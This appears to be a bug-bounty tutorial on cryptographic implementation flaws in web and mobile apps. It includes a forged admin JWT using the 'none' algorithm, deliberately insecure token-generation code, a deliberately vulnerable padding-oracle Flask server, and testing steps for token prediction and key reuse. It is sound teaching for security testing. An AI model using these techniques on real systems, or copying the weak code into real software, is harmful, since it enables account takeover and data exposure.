In this final installment of the Hacking Cryptography series, we’ll explore cryptographic vulnerabilities in web and mobile applications. Learning to hack crypto in this context is particularly valuable to bug bounty hunters, as cryptography has been vital to the widespread adoption of the internet. For example, even the most basic web-based shopping applications would not be possible without cryptography to protect credit card numbers in transit, securely store user credentials as hashes server side, and provide session-based user interactions via tokens/identifiers.

While there are countless ways in which cryptographic flaws can undermine the security of web and mobile apps, we’ll focus on some of the most common and impactful examples:

  • JSON Web Token (JWT) vulnerabilities
  • Predictable token/key generation
  • Hardcoded keys and key reuse
  • Padding oracle vulnerabilities
  • Improper use of initialization vectors (IVs)

JWT vulnerabilities

Understanding the risk

The use of JWTs for authentication in web and mobile applications has exploded in recent years, largely due to its integration with OAuth 2.0 and OpenID. These tokens provide a compact, URL-safe, and standardized way for applications to validate user identity and authorization claims without relying on server-side session storage—a model often referred to as stateless authentication.

For more information about JWTs, see https://datatracker.ietf.org/doc/html/rfc7519.

Maximizing impact for bug bounty

To maximize the impact of JWT vulnerabilities for bug bounty, it’s important to understand how modern stateless authentication with JWTs differs from traditional stateful session-based models. Historically, authentication relied on opaque session identifiers—random tokens issued after login, stored server side, and validated against a session table. The primary security concern was ensuring such tokens were sufficiently unpredictable.

In contrast, the security of JWTs hinges on cryptographically sound verification of the JWT signature and validation of JWT-embedded claims. Because the server does not store session state data, any weaknesses in signature handling or claim enforcement can allow an attacker to forge valid-looking tokens. From the bug bounty hunter’s perspective, this creates many interesting opportunities, ranging from user impersonation and privilege escalation to the injection of malicious inputs/payloads.

Lack of session invalidation

One common vulnerability with JWT-based authentication is the failure to fully invalidate user sessions on logout or password change/reset, which stems from the stateless authentication model. While a purely server-side failure to invalidate the session is a P5 (informational) finding, the severity increases to P4 (low) if any user session state data remains on the client side. This often manifests as an exploitable vulnerability when apps use separate hostnames for frontend and API traffic, with tokens being cleared on the client side for one host/domain (e.g., app.example.com) but not the other (e.g., api.example.com). Be sure to carefully test logout flows across all subdomains and storage contexts to catch these inconsistencies. When testing for these vulnerabilities in mobile apps, it can be fruitful to check all SQLite databases in the app’s folder, which often contain the contents of LocalStorage for WebView (Android) and WKWebView (iOS) components.

Lack of signature validation

In some cases, the server will issue signed JWTs but fail to validate the signature for JWTs accompanying user requests. When this happens, an attacker can make arbitrary changes to the JWT contents, such as changing the user ID, username, scope, and authorization grants. As you can imagine, the impact of such a vulnerability can be quite severe, as it can facilitate everything from privilege escalation to account takeover.

None algorithm attack

Similar to the lack of signature validation vulnerability, the none algorithm attack takes advantage of inadequate server-side signature validation. Specifically, this attack takes advantage of a legitimate feature of the JWT specification referred to as “unsecured JWTs” (see https://datatracker.ietf.org/doc/html/rfc7519#section-6). In this attack, we change the JWT alg parameter to None and then remove the signature portion of the JWT altogether. Consider the below signed JWT:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJidWdjcm93ZCIsImlhdCI6bnVsbCwiZXhwIjoxNzkzNDkxMTk5LCJhdWQiOiJidWdjcm93ZC5jb20iLCJzdWIiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIkdpdmVuTmFtZSI6IkpvaG4iLCJTdXJuYW1lIjoiRG9lIiwiRW1haWwiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIlJvbGUiOiJBZG1pbiJ9.9SkMh2-9wmnT09sbOZD583FQK5_vWdpP-Uzhqc5YWuM {"typ": "JWT","alg": "HS256"}
.
{"iss": "bugcrowd","iat": null,"exp": 1793491199,"aud": "bugcrowd.com","sub": "example@bugcrowd.com","GivenName": "John","Surname": "Doe","Email": "example@bugcrowd.com","Role": "Admin"}
.
\xF5\x29\x0C\x87\x6F\xFD\xC2\x69\xD3\xD3\xDB\x1B\x39\x90\xF9\xF3\x71\x50\x2B\x9F\xAF\x59\xDA\x4F\xFD\x4C\xE1\xA9\xCE\x58

 

When changed as follows, signature validation can be bypassed on the server side:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJidWdjcm93ZCIsImlhdCI6bnVsbCwiZXhwIjoxNzkzNDkxMTk5LCJhdWQiOiJidWdjcm93ZC5jb20iLCJzdWIiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIkdpdmVuTmFtZSI6IkpvaG4iLCJTdXJuYW1lIjoiRG9lIiwiRW1haWwiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIlJvbGUiOiJBZG1pbiJ9. {"typ": "JWT","alg": "none"}
.
{"iss": "bugcrowd","iat": null,"exp": 1793491199,"aud": "bugcrowd.com","sub": "example@bugcrowd.com","GivenName": "John","Surname": "Doe","Email": "example@bugcrowd.com","Role": "Admin"}
.

 

This feature is intended to support use cases that rely on other mechanisms to secure the JWT payload, but when the feature is enabled in the typical authentication use case, it can allow an attacker to make arbitrary changes to the JWT contents.

NOTE: JWTs make use of the “base64 encoding with URL-safe alphabet,” as defined in RFC 4648 § 5 (see https://datatracker.ietf.org/doc/html/rfc4648#section-5). Often referred to as base64url, this encoding scheme “omits the padding and replaces+ and / with - and _” (see URL and filename safe Base64).

Real-world example: CVE-2018-0114, Cisco JWT signature bypass

In 2018, the Cisco node-jose open-source library allowed an attacker to resign JWTs by embedding a public key in the JWT header and then signing the JWT using the corresponding (attacker-controlled) private key. This allowed the attacker to forge arbitrary JWTs, which the server-side components subsequently validated using the attacker-controlled public/private keypair.

This vulnerability is an excellent example of how the insecure implementation of otherwise secure cryptographic algorithms can lead to highly impactful weaknesses. Per RFC 7517, the JSON Web Key (JWK) standard specifies how identity providers can publish the public keys corresponding to the private keys used for signing JWTs, which enables clients to validate the authenticity of server-provided signed JWTs. Typically, we see identity providers publish such keys via the /.well-known/jwks.json endpoint. As bug bounty hunters, we can use this endpoint to glean valuable information about the server-side JWT implementation, such as a listing of supported signature algorithms.

For a hands-on demonstration of this vulnerability, check out the PentesterLab exercise here: https://pentesterlab.com/exercises/cve-2018-0114.

 

Predictable token/key generation

Understanding the risk

Tokens used for password resets, session identifiers, and key generation must be unpredictable. If developers use weak pseudo-random number generators (PRNGs), timestamp-based logic, or reuse keys across environments, attackers can predict tokens or replay values from one environment in another. Such vulnerabilities allow attackers to hijack sessions, reset passwords, and even bypass multifactor authentication (MFA), such as one-time passwords (OTPs). It is critical that developers make use of only cryptographically secure pseudo-random number generators (CSPRNGs) when relying on “randomness” for security in any way.

An ever-increasing number of applications and systems have started using SMS-based OTPs as a second authentication factor for sensitive operations, such as password reset flows and identity verification. Such ubiquitous use of SMS OTPs makes them an excellent attack vector that presents substantial risk if compromised. With this in mind, let’s explore how we can leverage this as bug bounty hunters.

Maximizing impact for bug bounty

Can you spot the bug in the following 6-digit token generation (i.e., SMS OTP) Python code?

import time import random def generate_reset_token(): seed = int(time.time()) random.seed(seed) token = ''.join([str(random.randint(0, 9)) for _ in range(6)]) return token

There are a couple of issues in the above code block leading to predictable OTPs:

  1. This line initializes the seed with the current date/time as a unix timestamp.
  2. The random.randint() method is not cryptographically secure because it generates predictable outputs for known inputs.

In other words, if we know seed, then we know the output of random.randint(). Want to test this out for yourself? Here’s a Linux/Mac OS one-liner that sets seed to a static value:

python3 -c "import random; random.seed(5); print(''.join(str(random.randint(0,9))for _ in range(6)))"

Run this several times and observe:

So, where are we most likely to find such bugs? Everywhere! In everything from SMS OTPs to web application session IDs and TLS session setup, the use of CSPRNGs is the cornerstone of security. As a general rule, we’re most likely to find such vulnerabilities in homegrown/in-house applications, obscure open-source libraries, embedded systems/IoT, and nonstandard systems/environments. While it does happen from time to time, we’re generally less likely to find such vulnerabilities in the well-hardened application flows exposed by cloud service providers or well-supported open-source projects.

When targeting web applications, token generation often seems like a black box, which can be intimidating. The key to identifying predictable token generation vulnerabilities is looking beyond whether a token appears to be random. The better question to ask is, How was the token generated? For example, these hashes appear pretty random, right?

29f3cbff3bbc47f981aa3862f9a5cf13ffe26d5698cf4a2b49594bea29b0ea8a
be5e2cae825f710675216ebb51caabe0a6fbb065184bc064c039126edb1b33f9
cbfdc82b236cc3bcec0ec6f203f866f71e7f69a171cffd65505d4b4abc01e539
cbfdc82b236cc3bcec0ec6f203f866f71e7f69a171cffd65505d4b4abc01e539
33ddbbf32e4f8b678d307f0b60dc7cd192fb1f474129d056c318fa9239e6c8e4
7d264d881564bc19eb15f71525f108b6829b3b0f5829af655fa434a49dcb293e
0c53d080f552531365cdddb6d6867d89047036b7c875f2330b14d1f89fc3d093
becee1ad9b4ec602df2d55188c11825a0124d3745c1fee4c37d83f7278f5c68e

Well, yes and no. Do they appear random? Yes. Are they random? No. These hashes were generated using the same insecure token generation code as the previous example:

import time
import random
import hashlib

def generate_reset_token():
seed = int(time.time())
random.seed(seed)
token = ''.join([str(random.randint(0, 9)) for _ in range(6)])
return hashlib.sha256(token.encode()).hexdigest()

I would suggest developing a library of scripts that implement common bug patterns, such as the above, that you can quickly adapt to specific use cases on a target-by-target basis. Here’s an example workflow to test for predictable token generation in a web application:

  1. Use the Burp Suite “Sequencer” tool to capture and export many instances of a given token.
  2. Glean what you can about the token generation algorithm (e.g., likely hash type based on length and context clues).
  3. Generate a list of guessed tokens using the bug pattern code block with predictable inputs (e.g., web request timestamp in unix epoch format, incrementing values).
  4. Look for any instances of guessed tokens (Step 3) in the list of exported tokens (Step 1).

When testing mobile applications, we have the benefit of source code disassembly, so we can actually just review the application’s token generation routines ourselves. When reverse engineering Android applications, we can typically unpack the APK and search the native Java code using tools like JadX. When working with iOS apps, we’ll typically be working with assembly-level disassembly using tools like Ghirda or IDA Pro. The key in both cases is to search for instances of common crypto-related class imports and method calls, such as java.util.Random, java.security.SecureRandom, rand(), and NSDate.

Real-world example

Any time a web or mobile application generates an opaque token or a key for use in cryptographic operations, it’s crucial to select a sufficiently random source of entropy. Over the years, there have been many examples of how predictable token/key generation can undermine the entire security posture of an application or system. In 2021, an open-source web-based time-tracking application called “Anuko Time Tracker” was found to generate predictable password reset codes, which could be exploited to take over other users’ accounts. In this particular case, the application simply used an MD5 hash of the current system time as users’ password reset tokens. For more information about this vulnerability, see https://nvd.nist.gov/vuln/detail/CVE-2021-21352.

 

Hardcoded keys and key reuse

Understanding the risk

Keys should be treated like passwords—secret, ephemeral, and never embedded in code. Yet many apps hardcode AES keys, JWT secrets, or API tokens into mobile binaries, frontend JavaScript bundles, or exposed .env files. Attackers can reverse engineer these apps to extract secrets and impersonate users or call privileged APIs.

Maximizing impact for bug bounty

To maximize the impact of hardcoded keys and key reuse vulnerabilities, it’s essential to understand the underlying cryptographic assumptions these systems are built on. Cryptography is only as strong as its weakest key. When secret keys are hardcoded into applications, shared across systems, or extracted by reverse engineering, the foundational guarantees of encryption, message integrity, and authentication break down completely.

 

Moving beyond “informational” severity

 

While the use of hardcoded keys can often lead to highly impactful bugs, the mere presence of hardcoded credentials is not guaranteed to be anything more than a P5 (informational) issue. To maximize impact, we must demonstrate the following:

 

  1. The key is active and valid (i.e., not expired).
  2. The key is used by the target application for some sensitive operation(s).
  3. The key is, in fact, not intended to be shared publicly (e.g., Google Maps API keys).
For example, if you can show that a hardcoded key in a mobile app or firmware image is used to encrypt API authentication tokens or sign privileged data, the vulnerability becomes not just a misconfiguration but an avenue for full authentication bypass, impersonation, and/or privilege escalation.

 

Exploitation vectors for bug bounty hackers
Hardcoded or embedded keys can be discovered in a variety of contexts:

 

  • Mobile apps—Decompile APK/IPA files and search for SecretKeySpec, Mac.getInstance, KeyGenerator, or string constants used with cryptographic APIs.
  • IoT and embedded devices—Extract firmware from update packages or file systems (via UART, SPI flash, or OTA ZIPs), then search for PEM-encoded keys or fixed symmetric keys in /certs/, /etc/ssl/, or source binaries.
  • JavaScript-heavy frontends—Although rare, sometimes, web developers inadvertently hardcode static keys into frontend logic used for JWT signing, request verification, or local data protection.
  • Shared libraries and SDKs—Third-party SDKs reused across multiple apps often include static secrets for analytics, licensing, or SSO. If the same key appears across apps or customers, you may have a platform-wide security issue.
In any of these cases, demonstrating the real-world use of the key greatly increases impact, especially if it’s used for signature verification, decryption, or authentication.

 

Signature forgery and widespread reuse

 

One of the highest-impact bug bounty scenarios is discovering that the same hardcoded symmetric key is used across all customers of a multi-tenant platform to sign JWTs or cookies. In this case, an attacker who extracts the key from their own app instance (or from a reverse-engineered device) can forge tokens to impersonate any user across the entire system. Even worse, if the key is used for the encryption of session tokens, password reset links, or PII, then the attacker may be able to decrypt or manipulate data for other users or tenants. Whenever hardcoded key reuse can be tied to cryptographic message forgery, the decryption of sensitive data, or privilege escalation, we’re likely to demonstrate significant security impact.

 

Another example of key reuse is when developers reuse the same key between DEV/QA environments and production environments. This vulnerability is relatively easy to test for and can lead to serious impact, depending on the operations the key is used to protect. When present, this vulnerability allows an attacker with QA/TEST credentials to impersonate other users in the production environment. To test for this bug, perform the following steps:

 

  1. Authenticate to the DEV/QA environment.
  2. Intercept and copy any sensitive tokens issued for the DEV/QA environment (e.g., session tokens).
  3. Authenticate to the PROD environment.
  4. Perform sensitive operations within the PROD environment and intercept the HTTP sessions.
  5. Replay the sensitive operations, replacing PROD-issued tokens with QA/TEST-issued tokens, one by one.

Real-world examples

There are many examples of both web and mobile applications using hardcoded and/or reused cryptographic keys, leading to vulnerabilities that range in impact from low/informational to absolutely critical. In fact, a recent analysis performed by the team at security.com highlighted numerous instances of hardcoded keys in mobile apps, some with millions of downloads. It is quite common to find innocuous third-party API keys in mobile app bundles (e.g., Google Maps API keys or marketing analytics API keys), which do not present any security risks in and of themselves. However, as this research highlights, there are many instances in which highly sensitive API keys are hardcoded into popular mobile apps, potentially exposing the personal information of millions of users.

 

 

Padding oracle vulnerabilities

Understanding the risk

When using AES-CBC encryption, data is padded before encryption and unpadded after decryption. If an application leaks errors (e.g., padding errors vs. MAC errors), attackers can modify ciphertext and observe responses to decrypt data byte by byte. This vulnerability allows plaintext recovery without the key and, in some cases, ciphertext forgery.

 

Maximizing impact for bug bounty

At first glance, padding errors in encrypted data might seem like a low-severity issue, but in practice, they can be devastating. Padding oracle vulnerabilities allows an attacker to decrypt, and sometimes encrypt, arbitrary ciphertexts without knowing the cryptographic key. This effectively breaks any confidentiality guarantees of symmetric encryption schemes, like AES-CBC. By demonstrating persistence with a solid proof of concept, this class of vulnerability can yield high-value findings.
To recognize and exploit a padding oracle, we need to understand what’s happening behind the scenes. Block ciphers (e.g., AES) operate on fixed-size blocks (e.g., 16B for AES), so plaintext inputs must be padded to align with blocks of that size. Common padding schemes, like PKCS#7, add bytes indicating the number of padding bytes at the end (e.g., \x03\x03\x03 for 3 bytes). If a server decrypts a ciphertext and encounters invalid padding, it will usually raise an error. If the app exposes different error messages (or even just different timing behaviors), it exposes a powerful side channel, which we can use to glean detailed information about the underlying cryptographic operation(s).
To demonstrate this vulnerability, we’ll use an intentionally vulnerable web application that returns verbose errors if the ciphertext is malformed. The web application expects a base64-encoded ciphertext and returns descriptive errors that allow us to glean valuable information about the decryption process.

 

from flask import Flask, request, jsonify
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
import base64
app = Flask(__name__)
# AES block size
BLOCK_SIZE = AES.block_size
# Static key (attacker doesn't know this)
KEY = get_random_bytes(16)
@app.route('/encrypt', methods=['GET'])
def encrypt():
plaintext = b'This is a secret message.'
iv = get_random_bytes(BLOCK_SIZE)
cipher = AES.new(KEY, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext, BLOCK_SIZE))
full_ciphertext = iv + ciphertext
encoded = base64.b64encode(full_ciphertext).decode()
return jsonify({'ciphertext': encoded})
@app.route('/decrypt', methods=['POST','GET'])
def decrypt():
try:
param_data = request.args.get('data')
if not param_data:
param_data = request.form.get('data')
if not param_data:
raw_body = request.get_data()
if raw_body:
param_data = raw_body.strip()
if not param_data:
return jsonify({'status': 'error', 'message': 'No data provided'}), 400
if isinstance(param_data, bytes):
param_data = param_data.decode()
raw = base64.b64decode(param_data)
iv = raw[:BLOCK_SIZE]
ct = raw[BLOCK_SIZE:]
cipher = AES.new(KEY, AES.MODE_CBC, iv)
pt = unpad(cipher.decrypt(ct), BLOCK_SIZE)
return jsonify({'status': 'success', 'plaintext': pt.decode()})
except ValueError as e:
if 'Padding is incorrect' in str(e):
return jsonify({'status': 'error', 'message': 'Invalid padding'}), 403
else:
return jsonify({'status': 'error', 'message': 'Decryption error'}), 400
except Exception as e:
return jsonify({'status': 'error', 'message': 'Unexpected error'}), 500
if __name__ == '__main__':
app.run(debug=True, port=5555)

 

If we run the above Python3 script and then visit http://localhost:5555/encrypt, we’re presented with an encrypted and base64-encoded string:

 

 

We’ll copy that string, URL encode any special characters (e.g., /, +), and then visit http://localhost:5555/decrypt?data=_BASE64_STRING_. If we provide a valid encrypted string, it’s successfully decrypted and the plaintext is displayed:

 

 

If we provide a string that includes correct padding—but is nevertheless not a valid encrypted string—the web server response indicates “Decryption error.”

 

 

However, if we provide a string that includes incorrect padding, the web server response indicates “Invalid padding.”

 

 

This difference in the web server’s response based on whether the submitted ciphertext includes valid padding acts as a side channel, which, in turn, can be used to brute force the key by sending many specially crafted requests. While this example uses obvious differences in the error message displayed, even subtle differences in web server responses (e.g., timing) can act as a padding oracle.
Challenge yourself: Create a client-side script that exploits this padding oracle bug.

 

Real-world examples

There are many examples of padding oracle attacks that have exposed large portions of the internet to potential compromise. Some notable examples include a 2010 vulnerability in ASP.NET View State (CVE‑2010‑3332) and the SSL 3.0 POODLE vulnerability (CVE-2014-3566). As demonstrated by a 2025 vulnerability in the Oberon PSA Crypto library, padding oracle vulnerabilities are still alive and well in the modern era. In this latest example, which is tracked as CVE-2025-7071, timing differences between the library’s handling of the “padding error” and “no padding error” conditions allowed an attacker to access decrypted ciphertext content on a byte-by-byte basis.

 

 

Improper use of IVs

Understanding the risk

In block cipher modes like CBC or CTR, IVs must be random and unique per message. Using a static, predictable, or null IV compromises security because two identical plaintexts produce identical ciphertexts, allowing attackers to infer relationships or recover data. Since IVs are often used to establish secure communication protocols, vulnerabilities leading to predictable or guessable IVs can carry significant risk to the confidentiality and integrity of both data and communications.

 

Maximizing impact for bug bounty

In many instances, these vulnerabilities are really just a subtype of the “predictable token generation” vulnerability. Here are some other notable bug patterns involving improper IV use:

 

IV reuse
A web or mobile application reuses an IV across multiple contexts, such as between different sessions and/or users.
Static IV
A web or mobile application uses the same IV for all instances of a given operation.
Null IV
A web or mobile application uses all zeros (e.g., 0x00000000) as the IV.
No IV in GCM or CBC
Some APIs and SDKs make IVs optional arguments for cryptographic-related methods, falling back to a null IV or previous memory content.

 

The exploitation of such vulnerabilities demands a deep understanding of the target’s cryptographic-relevant environment, which is much easier if we have runtime insight into a live system. For web applications, this is best achieved by setting up a test environment that we use to develop a proof of concept. For mobile applications, application disassembly and a rooted device give us all the insight we need.

 

Wrapping up the crypto series

This final installment of the Hacking Cryptography series has highlighted that despite the complexity of modern ciphers, the most critical weaknesses often lie in their implementation within web and mobile applications. For bug bounty hunters, the key takeaway is to look beyond the cryptographic primitive itself and focus on practical deployment: key management (hardcoded keys and key reuse), entropy sources, and how server responses may unintentionally leak critical information. By adopting a “show real-world impact” mindset and understanding how these implementation flaws break confidentiality and integrity guarantees, hackers can consistently find and maximize the impact of cryptographic bugs.

 

Thank you for following the crypto series. To start from the beginning, check out my first piece: Hacking crypto part I.